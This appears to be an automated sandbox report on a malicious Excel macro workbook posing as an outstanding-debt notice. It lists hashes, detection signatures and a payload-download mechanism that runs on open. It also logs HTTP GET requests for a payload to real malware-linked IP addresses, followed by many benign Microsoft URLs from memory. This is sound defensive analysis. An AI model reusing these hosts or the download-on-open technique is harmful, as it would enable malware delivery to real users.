Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-71778964-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-71778964-05042021.xlsm
Analysis ID:404155
MD5:19ad92f20025aa19a6947fa78fd142c1
SHA1:70b88be09827de5d40a03bca4ac49e2a7de69ea9
SHA256:f7bb7538509e6652197d8877aceac43f6370b763a323cb3990ab5991124b1941
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6212 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: excel.exeMemory has grown: Private usage: 1MB later: 79MB
Source: global trafficTCP traffic: 192.168.2.5:49713 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.5:49713 -> 91.211.91.81:80
Source: Joe Sandbox ViewIP Address: 91.211.91.81 91.211.91.81
Source: Joe Sandbox ViewIP Address: 5.34.179.36 5.34.179.36
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.aadrm.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.cortana.ai
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.office.net
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.onedrive.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://augloop.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://augloop.office.com/v2
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cdn.entity.
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://clients.config.office.net/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://config.edge.skype.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cortana.ai
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cortana.ai/api
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://cr.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dev.cortana.ai
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://devnull.onenote.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://directory.services.
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://graph.windows.net
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://graph.windows.net/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://lifecycle.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://login.windows.local
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://management.azure.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://management.azure.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://messaging.office.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://ncus.contentsync.
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://officeapps.live.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://onedrive.live.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://outlook.office.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://outlook.office365.com/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://powerlift.acompli.net
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://settings.outlook.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://staging.cortana.ai
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://tasks.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://webshell.suite.office.com
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://wus2.contentsync.
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: D47D16E7-9A16-4855-BDA9-1C37DDB21F3A.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-71778964-05042021.xlsmInitial sample: urlmon
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-71778964-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-71778964-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open
Source: Outstanding-Debt-71778964-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.expl.evad.winXLSM@1/10@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Outstanding-Debt-71778964-05042021.xlsmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{EDB76E20-2E12-4EE6-B507-4C62E3AF86B3} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-71778964-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-71778964-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-71778964-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-71778964-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-71778964-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
